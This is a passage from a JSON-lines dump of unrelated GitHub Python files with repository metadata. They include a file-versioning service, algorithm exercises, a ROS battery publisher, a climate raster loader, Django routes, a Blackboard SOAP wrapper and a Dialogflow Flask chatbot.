block_number, _file_data, False)\n\n @Action(\"put\", \"editor\", file_version=\"int:\", block_number=\"int:\", last_block=\"bool:\", _file_data=\"\")\n def put_file_block_completed(self, worker,\n file_version: \"int: Version of the file\",\n block_number: \"int: Block number\",\n last_block: \"bool: Is this the last block in the file?\",\n _file_data):\n result = dict()\n block_hash = None\n if len(_file_data) > 0:\n block_hash = worker.write_block_data(file_version, block_number, _file_data, last_block)\n if last_block:\n file_length, file_hash = worker.finalize_file_version(file_version, block_number)\n self.props[\"file_length\"] = file_length\n self.props[\"file_hash\"] = file_hash\n self.props[\"file_version\"] = file_version\n self.modified = True\n result = self.get_metadata(worker)\n if block_hash:\n result[\"props\"][\"block_hash\"] = block_hash\n else:\n result[\"block_hash\"] = block_hash\n return result\n\n @Action(\"get\", \"reader\")\n def get_file(self, worker) -> \"binary\":\n \"\"\" Return the current version of a file \"\"\"\n return self.get_file_version(worker, self.props[\"file_version\"])\n\n @Action(\"get\", \"reader\", view=\"meta\")\n def get_file_meta(self, worker):\n return self.get(worker)\n\n @Action(\"get\", \"reader\", file_version=\"int:\")\n def get_file_version(self, worker,\n file_version: \"Version of the file to return\") -> \"binary\":\n \"\"\" Return a specified version of a file \"\"\"\n file_length = worker.get_file_length(file_version)\n if file_length is None:\n raise ServiceException(404, \"Bad file_version: {}\".format(file_version))\n def get_blocks():\n for block_number in [block_info[\"block_number\"] for block_info in worker.list_file_blocks(file_version)]:\n yield worker.get_block_data(file_version, block_number)\n return FileResponse(self.name, file_length, get_blocks)\n\n @Action(\"get\", \"reader\", versions=\"true\")\n def list_versions(self, worker):\n return worker.list_file_versions()\n\n @Action(\"post\", \"editor\", previous_version=\"int:\")\n def post_file_version_length(self, worker,\n previous_version):\n \"\"\" Create a new file based on a previous version \"\"\"\n result = dict()\n result[\"file_version\"] = worker.create_file_version(previous_version)\n return result\n\n @Action(\"get\", \"reader\", list_blocks=\"bool:true\", file_version=\"int:\")\n def list_blocks(self, worker, file_version):\n return worker.list_file_blocks(file_version)\n\n @Action(\"get\", \"reader\", file_version=\"int:\", block_number=\"int:\")\n def get_file_block(self, worker, file_version, block_number):\n block_data = worker.get_block_data(file_version, block_number)\n def get_blocks():\n yield block_data\n return FileResponse(self.name, len(block_data), get_blocks)\n\n @staticmethod\n def list_property_selector(public_data):\n result = dict()\n props = public_data[\"props\"]\n result[\"file_version\"] = props[\"file_version\"]\n result[\"file_hash\"] = props[\"file_hash\"]\n result[\"file_length\"] = props[\"file_length\"]\n return result\n\n","repo_name":"arethuza/perspective7","sub_path":"items/file_item.py","file_name":"file_item.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73447016146","text":"# 햄버거 다이어트\nT = int(input())\nfor TC in range(1, T+1):\n N, L = map(int, input().split())\n T = []\n K = []\n result = 0\n for n in range(N):\n Ti, Ki = map(int, input().split())\n T.append(Ti)\n K.append(Ki)\n for i in range(1 << N):\n sumK = sumT = 0\n for j in range(N):\n if i & (1 << j):\n sumK += K[j]\n sumT += T[j]\n if sumK <= L:\n if sumT > result:\n result = sumT\n print(\"#{} {}\".format(TC, result))\n\n'''\nPowerset 다시 생각해보기!!\n'''","repo_name":"eunzi-kim/CODE_Practice","sub_path":"SWEA/D3/5215.py","file_name":"5215.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73477030225","text":"def palindrome(str):\r\n stack=[]\r\n queue=[]\r\n \r\n # Better code : stack=list(str) and queue=list(reverse(str))\r\n for i in str:\r\n stack.append(i)\r\n queue.insert(0,i)\r\n \r\n #Better Code : return(stack==queue)\r\n while stack and queue:\r\n if stack.pop()==queue.pop():\r\n continue\r\n else:\r\n return(False)\r\n return(True)\r\n \r\nprint(palindrome(\"racecar\"))","repo_name":"Shreyansh-Agarwal2022/Python-DSA","sub_path":"DSA Python Learning/Practice Question/palindrome_using_stack_queue.py","file_name":"palindrome_using_stack_queue.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15781394512","text":"# 모험가 N명. 각 모험가마다 공포도가 숫자로 써있음.\n# 공포도가 x인 모험가는 반드시 x명 이상으로 구성한 모��가 그룹에 참여해야 여행 가능.\n# 몇명의 모험가는 마을그대로에 남아있어도됨. 1 <= N <= 100,000. 최대한으로 짤 수 있는 그룹수?\n# 2 3 1 2 2\n\nn = int(input())\n\nguild = list(map(int,input().split()))\n\nguild.sort()\n\ngroup = 0\ncnt = 1\n\nfor i in range(len(guild)):\n guild[i] -= cnt\n\n if guild[i] <= 0:\n group += 1\n cnt = 1\n \n else:\n cnt += 1\n\nprint(guild)\nprint(group)\n\n# 1 2 2 2 3 cnt = 1, group = 0\n# 0 2 2 2 3 cnt = 1, group = 1\n# 0 1 2 2 3 cnt = 2, group = 1\n# 0 1 0 2 3 cnt = 1, group = 2\n# 0 1 0 1 3 cnt = 2, group = 2\n# 0 1 0 1 1 cnt = 3, group = 2\n# 리스트에서 0이되거나 0보다 작은 수가 있는 위치에서 그룹이 형성된 것임.\n\n","repo_name":"gun-0208/studying_algorithm","sub_path":"이것이 코딩테스트다/ch11_그리디_01.py","file_name":"ch11_그리디_01.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41617504951","text":"# Definition for a Node.\nclass Node:\n def __init__(self, x: int, next: 'Node' = None, random: 'Node' = None):\n self.val = int(x)\n self.next = next\n self.random = random\n\n\nclass Solution:\n \"\"\"\n Description:\n A linked list is given such that each node contains an additional random pointer which could point to any node in the list or null.\n Return a deep copy of the list.\n The Linked List is represented in the input/output as a list of n nodes. Each node is represented as a pair of [val, random_index] where:\n val: an integer representing Node.val\n random_index: the index of the node (range from 0 to n-1) where random pointer points to, or null if it does not point to any node.\n Idea:\n Main problem is absence of *new* random node to point to.\n So use either HashTable or point cur.next to new node to another and few passes throught the nodes\n Complexity:\n Time: O(n)\n Space: O(n) with hashtable and O(1) without\n\n \"\"\"\n def copyRandomList(self, head: 'Node') -> 'Node':\n \"\"\"\n table = {}\n cur = head\n while cur:\n table[cur] = Node(cur.val)\n cur = cur.next\n\n cur = head\n while cur:\n table[cur].next = table[cur.next] if cur.next else None\n table[cur].random = table[cur.random] if cur.random else None\n cur = cur.next\n return table[head] if head else None\n \"\"\"\n\n if not head:\n return head\n cur = head\n while cur:\n new_node = Node(cur.val)\n new_node.next = cur.next\n cur.next = new_node\n cur = cur.next.next\n\n cur = head\n while cur:\n if cur.random:\n cur.next.random = cur.random.next\n cur = cur.next.next\n new_head = head.next\n pold = head\n pnew = new_head\n while pnew.next:\n pold.next = pnew.next\n pold = pold.next\n pnew.next = pold.next\n pnew = pnew.next\n\n pnew = None\n pold = None\n return new_head\n","repo_name":"g0t0wasd/leetcode_solutions","sub_path":"138_copy_list_with_random_pointer_medium.py","file_name":"138_copy_list_with_random_pointer_medium.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7998170092","text":"#!/usr/bin/env python\n# license removed for brevity\nimport rospy\nfrom std_msgs.msg import Int64, Bool, String\n\nBATTERY = 100\n\ndef battery_info(battery):\n pub = rospy.Publisher('chatter', Int64, queue_size = 10)\n rospy.init_node('battery_info', anonymous = True)\n rate = rospy.Rate(100) #publish for 100 Hz rate\n while not rospy.is_shutdown():\n battery_int = BATTERY\n rospy.loginfo(battery_int)\n pub.publish(battery_int)\n rate.sleep()\n\n\ndef low_battery_alert(battery):\n pub = rospy.Publisher('chatter', Bool, queue_size = 10)\n rospy.init_node('low_battery_alert', anonymous = True)\n rate = rospy.Rate(100)\n while not rospy.is_shutdown():\n if battery <= 15:\n battery_alert = True\n else:\n battery_alert = False\n rospy.loginfo(battery_alert)\n pub.publish(battery_alert)\n rate.sleep()\n\ndef battery_information_msg(battery, alert):\n pub = rospy.Publisher('chatter', String, queue_size = 10)\n rospy.init_node('battery_information_msg', anonymous = True)\n rate = rospy.Rate(100)\n while not rospy.is_shutdown():\n battery_information_string = 'Current battery status is %d'%battery\n if alert:\n battery_information_string += ' LOW BATTERY!'\n rospy.loginfo(battery_information_string)\n pub.publish(battery_information_string)\n rate.sleep()\n\nif __name__ == \"__main__\":\n try:\n battery_info(BATTERY)\n # bool = low_battery_alert(BATTERY)\n # battery_information_msg(BATTERY, bool)\n except rospy.ROSInterruptException:\n pass\n","repo_name":"Guerilla-Coders/Delievery-Arcade-Agent","sub_path":"practice/battery_pub.py","file_name":"battery_pub.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28019000812","text":"#!/usr/bin/env python3\n\nimport csv\n\n\npapers = dict()\n\nwith open(\"cgo18-authors.csv\") as infile:\n reader = csv.reader(infile)\n next(reader, None) # skip the headers\n for row in reader:\n _, title, firstname, surname, _, affil, _ = row\n author = ' '.join((firstname, surname))\n if title not in papers:\n papers[title] = [(author, affil)]\n else:\n papers[title].append((author, affil))\n\nfor paper in sorted(papers, key=lambda s: s.lower()):\n print(f'{paper}
')\n current_affil = None\n for i, (author, affil) in enumerate(papers[paper]):\n if current_affil and affil != current_affil:\n print(f' ({current_affil})', end=\"\")\n current_affil = affil\n elif not current_affil:\n current_affil = affil\n if i:\n print(', ', end=\"\")\n print(author, end=\"\")\n print(f' ({current_affil})

\\n')\n","repo_name":"ChrisCummins/cgo2018","sub_path":"scripts/make-list-of-accepted-papers.py","file_name":"make-list-of-accepted-papers.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27459028895","text":"from flask import Blueprint, render_template, flash, redirect, url_for\n\nfrom src import crud\nfrom src.models.snippet import SnippetModel\nfrom src.modules.add_snippet.forms import AddSnippetForm\n\nadd_snippet_blueprint = Blueprint(\n 'add_snippet',\n __name__,\n template_folder='templates/add_snippet',\n)\n\n\n@add_snippet_blueprint.route('/add-snippet', methods=['GET', 'POST'])\ndef index():\n form = AddSnippetForm()\n\n if form.validate_on_submit():\n if form.code.data == \"\":\n flash(\"Code field can't be empty\", \"error\")\n return render_template('add_snippet.html', form=form)\n\n snippet = SnippetModel(\n name=form.name.data,\n language=form.language.data,\n code=form.code.data\n )\n crud.snippet.create(obj_new=snippet)\n flash('Snippet added successfully', 'success')\n\n return redirect(url_for(\"index.index\"))\n\n return render_template('add_snippet.html', form=form)\n","repo_name":"NickNaskida/CodeTyper","sub_path":"src/modules/add_snippet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32391576914","text":"import numpy as np\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom Projects.KalmanSmoother.__init__ import ROOT_DIR\nbase_dir = ROOT_DIR+'/Data/output/'\nfrom GeneralUtilities.Filepath.instance import FilePathHandler\nfrom KalmanSmoother.Utilities.__init__ import ROOT_DIR as ROOT_DIR_PLOT\nimport pickle\nfrom GeneralUtilities.Plot.Cartopy.eulerian_plot import BaseCartopy\nimport cartopy.crs as ccrs\nimport matplotlib\nfrom KalmanSmoother.Utilities.Floats import DIMESAllFloats,WeddellAllFloats\nfrom geopy.distance import GreatCircleDistance\nfrom KalmanSmoother.Utilities.Utilities import speed_calc\nfrom KalmanSmoother.Utilities.Filters import Smoother,ObsHolder\nfrom KalmanSmoother.Utilities.DataLibrary import dimes_position_process,dimes_velocity_process,dimes_depth_noise,dimes_stream_noise,dimes_toa_noise,dimes_interp_noise\nfrom KalmanSmoother.Utilities.DataLibrary import weddell_position_process,weddell_velocity_process,weddell_depth_noise,weddell_stream_noise,weddell_toa_noise,weddell_interp_noise\n\nfile_handler = FilePathHandler(ROOT_DIR_PLOT,'FinalFloatsPlot')\nmatplotlib.rcParams.update({'font.size': 22})\n\nWeddellAllFloats.list = []\nall_floats = WeddellAllFloats()\nfor idx,dummy in enumerate(all_floats.list):\n print(idx)\n dummy.toa.set_observational_uncertainty(weddell_toa_noise)\n dummy.depth.set_observational_uncertainty(weddell_depth_noise)\n dummy.stream.set_observational_uncertainty(weddell_stream_noise)\n dummy.gps.interp_uncertainty = weddell_interp_noise\n obs_holder = ObsHolder(dummy)\n smooth =Smoother(dummy,all_floats.sources,obs_holder,process_position_noise=weddell_position_process,process_vel_noise =weddell_velocity_process)\n\nsmooth_toa_error = []\nsmooth_speed = []\nfor idx,dummy in enumerate(all_floats.list):\n print(idx)\n dist_error_list,toa_error_list,dist_list,soso_list,date_return_list,obs_list = dummy.toa.calculate_error_list(dummy.pos,dummy.pos_date)\n smooth_toa_error += toa_error_list\n smooth_speed += speed_calc(dummy.pos,dummy.pos_date)\nsmooth_speed = [x for x in smooth_speed]\nprint('mean smoother toa misfit was')\nprint(np.mean(smooth_toa_error))\nprint('smoother std was')\nprint(np.std(smooth_toa_error))\nprint('median smooth speed is')\nprint(np.median(smooth_speed))\nprint('mean smooth speed is')\nprint(np.mean(smooth_speed))\n\nfig = plt.figure(figsize=(12,12))\n\nplt.subplot(2,1,1)\nplt.hist(smooth_toa_error,bins=100)\nplt.yscale('log')\nplt.xlim([-70,70])\nplt.xlabel('Misfit (s)')\nplt.annotate('a',xy = (0.8,0.75),xycoords='axes fraction',zorder=10,size=28,bbox=dict(boxstyle=\"round\", fc=\"0.8\"),)\n\n\nplt.subplot(2,1,2)\nplt.hist(smooth_speed,bins=100)\nplt.yscale('log')\nplt.xlim([0,20])\nplt.xlabel('Speed ($km\\ day^{-1}$)')\nplt.annotate('b',xy = (0.8,0.75),xycoords='axes fraction',zorder=10,size=28,bbox=dict(boxstyle=\"round\", fc=\"0.8\"),)\nplt.savefig(file_handler.out_file('Figure_17'))\n\n\ndel all_floats\nall_floats = DIMESAllFloats()\nfor idx,dummy in enumerate(all_floats.list):\n print(idx)\n dummy.toa.set_observational_uncertainty(dimes_toa_noise)\n dummy.stream.set_observational_uncertainty(dimes_stream_noise)\n dummy.depth.set_observational_uncertainty(dimes_depth_noise)\n obs_holder = ObsHolder(dummy)\n smooth =Smoother(dummy,all_floats.sources,obs_holder,process_position_noise=dimes_position_process,process_vel_noise =dimes_velocity_process)\ntrj_dist_error = []\ntrj_toa_error = []\ntrj_speed = []\nsmooth_dist_error = []\nsmooth_toa_error = []\nsmooth_speed = []\nfor idx,dummy in enumerate(all_floats.list):\n print(idx)\n dist_error_list,toa_error_list,dist_list,soso_list,date_return_list,obs_list = dummy.toa.calculate_error_list(dummy.trj_pos,dummy.trj_date)\n trj_dist_error += dist_error_list\n trj_toa_error += toa_error_list\n trj_speed += speed_calc(dummy.trj_pos,dummy.trj_date)\n dist_error_list,toa_error_list,dist_list,soso_list,date_return_list,obs_list = dummy.toa.calculate_error_list(dummy.pos,dummy.pos_date)\n smooth_dist_error += dist_error_list\n smooth_toa_error += toa_error_list\n smooth_speed += speed_calc(dummy.pos,dummy.pos_date)\ntrj_diff_list = []\nfor idx,dummy in enumerate(all_floats.list):\n for pos,date in zip(dummy.trj_pos,dummy.trj_date):\n try:\n idx = dummy.pos_date.index(date)\n trj_diff_list.append(GreatCircleDistance(pos,dummy.pos[idx]).km)\n except:\n continue\n\nprint('mean ARTOA toa misfit was')\nprint(np.mean(trj_toa_error))\nprint('ARTOA std was')\nprint(np.std(trj_toa_error))\nprint('mean smoother toa misfit was')\nprint(np.mean(smooth_toa_error))\nprint('smoother std was')\nprint(np.std(smooth_toa_error))\nprint('median trj diff is')\nprint(np.median(trj_diff_list))\nprint('mean trj diff is')\nprint(np.mean(trj_diff_list))\nprint('median smooth speed is')\nprint(np.median(smooth_speed))\nprint('mean smooth speed is')\nprint(np.mean(smooth_speed))\nprint('median trj speed is')\nprint(np.median(trj_speed))\nprint('mean trj speed is')\nprint(np.mean(trj_speed))\n\n\nplt.figure(figsize=(13,13))\nplt.subplot(3,1,1)\nbins = np.linspace(-30,30,200)\ntrj_n,dummy,dummy = plt.hist(trj_toa_error,bins=bins,color='b',label='ARTOA',alpha=0.3)\nkalman_n,dummy,dummy = plt.hist(smooth_toa_error,bins=bins,color='g',label='Smoother',alpha=0.3)\nplt.yscale('log')\nplt.legend()\nplt.xlabel('Misfit (seconds)', fontsize=22)\nplt.annotate('a', xy = (0.2,0.75),xycoords='axes fraction',zorder=10,size=32,bbox=dict(boxstyle=\"round\", fc=\"0.8\"),)\nplt.subplot(3,1,2)\nbins = np.linspace(0,300,40)\nplt.xlim([0,300])\nplt.hist(trj_diff_list,bins=bins)\nplt.yscale('log')\nplt.xlabel('Trajectory Difference (km)', fontsize=22)\nplt.annotate('b', xy = (0.2,0.75),xycoords='axes fraction',zorder=10,size=32,bbox=dict(boxstyle=\"round\", fc=\"0.8\"),) \nplt.subplot(3,1,3)\nbins = np.linspace(0,41,30)\nplt.hist(smooth_speed,bins=bins,color='g',label='Kalman',alpha=0.3)\nplt.hist(trj_speed,bins=bins,color='b',label='DIMES',alpha=0.3)\nplt.yscale('log')\nplt.annotate('c', xy = (0.8,0.7),xycoords='axes fraction',zorder=10,size=32,bbox=dict(boxstyle=\"round\", fc=\"0.8\"),) \nplt.xlim([0,35])\n# plt.yscale('log')\nplt.xlabel('Speed (km $day^{-1}$)', fontsize=22)\nplt.subplots_adjust(hspace=0.3)\nplt.savefig(file_handler.out_file('Figure_11'))\nplt.close()","repo_name":"Chamberpain/KalmanSmoother","sub_path":"Utilities/Plots/Figure_13_And_17.py","file_name":"Figure_13_And_17.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73169876944","text":"import rasterio\nfrom builder import climate_db\nfrom psycopg2.extras import execute_values\nimport numpy\nimport geojson\nfrom rasterio.plot import show\nfrom pyproj import Transformer\n\nseasons = [\"winter\",\"spring\",\"summer\",\"autumn\",\"annual\"]\ndecades = [\"1980\",\"1990\",\"2000\",\"2010\",\"2020\",\n \"2030\",\"2040\",\"2050\",\"2060\",\"2070\"]\n\ndef nuke(db,table):\n data_cols={\n table: [[\"id\",\"serial primary key\"]]\n }\n\n # optimising for reading - store all the variables for each decade\n # together, this means it's a single select averaging them together\n # across primary key location ids\n for decade in decades:\n data_cols[table].append([\"tas_\"+decade,\"real\"])\n data_cols[table].append([\"tasmax_\"+decade,\"real\"])\n data_cols[table].append([\"tasmin_\"+decade,\"real\"])\n data_cols[table].append([\"sfcWind_\"+decade,\"real\"])\n data_cols[table].append([\"pr_\"+decade,\"real\"])\n data_cols[table].append([\"rsds_\"+decade,\"real\"])\n\n db.create_tables(data_cols)\n\ndef test_print(arr,w,h): \n for x in range(0,h,10):\n r = \"\"\n for y in range(0,w,10):\n v=arr[x][y]\n if v<-9999: r+=\" \"\n else: r+=str(int(v))\n print(r)\n\ndef print_check(t,start,end,skip):\n seasons = [\"winter\",\"spring\",\"summer\",\"autumn\"]\n print(int(t/4)+1980,seasons[t%4],int(start/4)+1980,int(end/4)+1980)\n \ndef avg_slice(start,end,skip,img):\n count=0\n total=0\n arr=numpy.zeros((img.height,img.width),numpy.float)\n for t in range(start,end,skip):\n print_check(t,start,end,skip)\n image = img.read(t+1)\n count+=1\n arr=arr+image\n arr/=count\n test_print(arr,img.width,img.height)\n return arr\n\ndef build_season_avg(img,season):\n return [avg_slice(season+d*40,season+(d+1)*40,4,img) for d in range(0,10)]\n\ndef build_avg(img):\n return [avg_slice(d*40,(d+1)*40,1,img) for d in range(0,10)]\n\ndef save_tiff(img,arr,table,rcp,variable,season,decade):\n with rasterio.Env():\n profile = img.profile\n profile.update(\n dtype=rasterio.float32,\n count=1,\n compress='lzw')\n\n fn = table+'_'+rcp+'_'+variable+'_'+seasons[season]+'_'+decades[decade]+'.tif'\n \n with rasterio.open(fn, 'w', **profile) as dst:\n dst.write(arr.astype(rasterio.float32), 1)\n\ndef save_averages(db,rcp,fn,table,variable):\n img = rasterio.open(fn)\n \n for decade in range(0,10):\n # winter/summer\n for season in [0,2]:\n print(rcp,variable)\n arr=avg_slice(season+decade*40,season+(decade+1)*40,4,img)\n save_tiff(img,arr,table,rcp,variable,season,decade);\n \n # annual\n for decade in range(0,10):\n print(rcp,variable)\n arr = avg_slice(decade*40,(decade+1)*40,1,img)\n save_tiff(img,arr,table,rcp,variable,4,decade);\n\n\ndef print_crs(fn):\n print(\"hello\")\n img = rasterio.open(fn)\n print(img.crs)\n\n \ndef load_grid(db,fn):\n img = rasterio.open(fn)\n\n print(img.crs)\n \n time_size = img.count\n x_size = img.width\n y_size = img.height\n\n data_cols = {\n \"chess_scape_grid\":\n [[\"id\",\"serial\"],\n [\"geom\",\"geometry(geometry, 4326)\"],\n [\"properties\",\"jsonb\"]],\n }\n\n db.create_tables(data_cols)\n\n transformer = Transformer.from_crs(img.crs, 4326) \n\n features = []\n # assumptions to check - coord is centre of pixel?\n for x in range(0,x_size):\n for y in range(0,y_size):\n\n pos = img.xy(y,x)\n \n a = transformer.transform(pos[0]-500,pos[1]-500)\n b = transformer.transform(pos[0]+500,pos[1]-500)\n c = transformer.transform(pos[0]+500,pos[1]+500)\n d = transformer.transform(pos[0]-500,pos[1]+500)\n\n # lat/lng = y/x\n features.append(geojson.Feature(id=x*y_size+y, geometry=geojson.Polygon([[\n (a[1],a[0]),(b[1],b[0]),(c[1],c[0]),(d[1],d[0])]],properties={})))\n print(\"loading grid \"+str(int((x/x_size)*100))+\"%\")\n \n db.import_geojson_feature(\"chess_scape_grid\",\"4326\",geojson.FeatureCollection(features))\n db.conn.commit()\n\n \ndef load_data(db,fn,table,decade,variable):\n img = rasterio.open(fn)\n\n vardec = variable+'_'+decade\n \n time_size = img.count\n x_size = img.width\n y_size = img.height\n\n print(\"updating: \"+table+\" \"+variable+\" decade:\"+decade)\n\n for y in range(0,y_size):\n values = img.read(1)[y]\n dat = []\n for x in range(0,x_size):\n value = values[x]\n grid_id = x*y_size+y\n if value > -9999:\n dat.append([grid_id,float(value)])\n\n\n q=f\"\"\"with new_values (id,{vardec}) as (values %s),\n upsert as ( update {table} m set {vardec} = nv.{vardec}\n from new_values nv\n where m.id = nv.id\n returning m.* )\n insert into {table} (id,{vardec})\n select id,{vardec}\n from new_values\n where not exists (select 1 from upsert up where up.id=new_values.id)\"\"\"\n \n #q=f\"insert into {table} (location,season,{variable}) values %s on conflict (location,season) do update set {variable} = excluded.{variable};\"\n execute_values(db.cur,q,dat)\n db.conn.commit()\n \ndef test_data(db,fn,table,variable):\n img = rasterio.open(fn)\n \n for x in range(0,img.height,10):\n r = \"\"\n for y in range(0,img.width,10):\n v=img.read(1)[x][y]\n if v>-9999: r+=\" \"\n else: r+=str(int(v))\n print(r)\n\ndef import_tiffs(db,path,rcp,variable):\n for season in [\"annual\",\"summer\",\"winter\"]:\n for decade in [\"1980\",\"1990\",\"2000\",\"2010\",\"2020\",\n \"2030\",\"2040\",\"2050\",\"2060\",\"2070\"]:\n fn = 'chess_scape_'+rcp+'_'+variable+'_'+season+'_'+decade+'.tif'\n load_data(db,path+fn,'chess_scape_'+rcp+'_'+season,decade,variable)\n\ndef import_grid(db,path,fn):\n load_grid(db,path+fn)\n \ndef create_averages(db,rcp,path,variable):\n fn = \"chess-scape_\"+rcp+\"_bias-correctedMEAN_\"+variable+\".tif\"\n save_averages(db,rcp,path+fn,\"chess_scape\",variable)\n\n","repo_name":"UniExeterRSE/LCAT","sub_path":"data/builder/tiff_loader.py","file_name":"tiff_loader.py","file_ext":"py","file_size_in_byte":6208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42203838811","text":"from django.urls import path, include\n\nfrom . import views\nfrom django.contrib.auth import views as auth_views\n\nurlpatterns = [\n path('', views.post_list, name=\"posts\"),\n # path('login',views.post_login,name=\"login\"),\n path('register', include('users.urls')),\n path('login', auth_views.LoginView.as_view(\n template_name='posts/login.html'), name='login'),\n path('logout', auth_views.LogoutView.as_view(\n template_name='posts/logout.html'), name='logout'),\n\n path('create', views.post_create, name=\"create\"),\n path('', views.post_detail, name=\"detail\"),\n path('/edit', views.post_update, name=\"update\"),\n path('/delete', views.post_delete, name=\"delete\"),\n\n\n]\n","repo_name":"asb19/My-Python-Projects","sub_path":"amir/posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39444375086","text":"from deepcardio_utils import ImageReader, plot_cell\n\nif __name__=='__main__':\n imageReader = ImageReader(rollingSize=3)\n images = imageReader.get_full_images()\n classes = imageReader.get_frame_wise_class_gmm()\n pixelClass = imageReader.get_pixel_wise_classification()\n\n idx = 3\n im = images[idx].copy()\n im[:, :, 1] = pixelClass[idx]*50\n plot_cell(im)","repo_name":"raulbenitez/DEEPCARDIO","sub_path":"sparks/train/generatePixelWiseClass.py","file_name":"generatePixelWiseClass.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42040666098","text":"'''\r\nCreated on Jan 11, 2011\r\n\r\n@author: Chris Greenough - Chris.Greenough@nau.edu\r\n'''\r\nfrom bbwsdl.NauService_services import *\r\nfrom bbwsdl.NauService_services_types import *\r\nimport logging\r\nclass NauService(object):\r\n log=logging.getLogger(\"NauService\")\r\n port=None\r\n sigHandler=None\r\n def __init__(self,sigHandler, baseUrl=None):\r\n self.sigHandler=sigHandler\r\n \r\n locator = NauServiceLocator()\r\n self.port=locator.getNauServicePortType(baseUrl)\r\n self.port.binding.sig_handler=self.sigHandler\r\n \r\n self.log.info(\"Connecting to NauService\")\r\n def batchChangeEnrollmentStatus(self,courseBatchUid,peopleBatchUids,disabled=False):\r\n request = BatchChangeEnrollmentStatusRequest()\r\n request._courseBatchUid=courseBatchUid\r\n request._peopleBatchUid=peopleBatchUids\r\n request._disabled=disabled\r\n response = self.port.BatchChangeEnrollmentStatus(request)\r\n return response._return\r\n \r\n def getIdsFromBatchUids(self, batchUids):\r\n request = GetIdsFromBatchUidsRequest()\r\n request._batchUids=batchUids\r\n responses = self.port.GetIdsFromBatchUids(request)\r\n ## Return $ delimited into hash\r\n ret = dict()\r\n for response in responses._return:\r\n parts=response.split(\"$\")\r\n ret[parts[0]]=parts[1]\r\n return ret\r\n \r\n def changeEnrollmentStatus(self,courseBatchUid,personBatchUid,disabled=False):\r\n request = ChangeEnrollmentStatusRequest()\r\n request._courseBatchUid=courseBatchUid\r\n request._personBatchUid=personBatchUid\r\n request._disabled=disabled\r\n response = self.port.ChangeEnrollmentStatus(request)\r\n return response._return\r\n \r\n def rollupCourse(self, parentBatchUid, childBatchUid, enable=True):\r\n request = RollupCourseRequest()\r\n request._parentBatchUid=parentBatchUid\r\n request._childBatchUid=childBatchUid\r\n request._enable=enable\r\n response=self.port.RollupCourse(request)\r\n return response._return\r\n \r\n def isRolledup(self, parentBatchUid, childBatchUid):\r\n request = IsRolledupRequest()\r\n request._parentBatchUid=parentBatchUid\r\n request._childBatchUid=childBatchUid\r\n response=self.port.IsRolledup(request)\r\n return response._return\r\n \r\n def createUpdateUser(self,studentId, firstName, lastName, email, userName, isAvailable=True):\r\n request = CreateUpdateUserRequest()\r\n request._studentId=studentId\r\n request._firstName=firstName\r\n request._lastName=lastName\r\n request._email=email\r\n request._userName=userName\r\n request._isAvailable=isAvailable\r\n response=self.port.CreateUpdateUser(request)\r\n return response._return","repo_name":"ebinezar/bbpy","sub_path":"bbpy/src/BbPy/NauService.py","file_name":"NauService.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30421676469","text":"from flask import Flask,request,render_template,url_for,jsonify\r\nimport os\r\nimport dialogflow\r\nfrom google.api_core.exceptions import InvalidArgument\r\n\r\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = 'watsappchatbot-ds-fwfj-5c66438b368f.json'\r\n\r\nDIALOGFLOW_PROJECT_ID = 'watsappchatbot-ds-fwfj'\r\nDIALOGFLOW_LANGUAGE_CODE = 'en'\r\nSESSION_ID = 'me'\r\n\r\napp=Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n \r\n return render_template('home.html')\r\n\r\n\r\n\r\n@app.route('/predict',methods=['POST'])\r\ndef predict():\r\n \r\n if request.method=='POST':\r\n text_to_be_analyzed=request.form['message']\r\n\r\n\r\n\r\n session_client = dialogflow.SessionsClient()\r\n session = session_client.session_path(DIALOGFLOW_PROJECT_ID, SESSION_ID)\r\n text_input = dialogflow.types.TextInput(text=text_to_be_analyzed, language_code=DIALOGFLOW_LANGUAGE_CODE)\r\n query_input = dialogflow.types.QueryInput(text=text_input)\r\n try:\r\n response = session_client.detect_intent(session=session, query_input=query_input)\r\n except InvalidArgument:\r\n raise\r\n \r\n print(\"Query text:\", response.query_result.query_text)\r\n print(\"Detected intent:\", response.query_result.intent.display_name)\r\n print(\"Detected intent confidence:\", response.query_result.intent_detection_confidence)\r\n print(\"Fulfillment text:\", response.query_result.fulfillment_text)\r\n return render_template('home.html',pre=response.query_result.fulfillment_text)\r\nif __name__=='__main__':\r\n 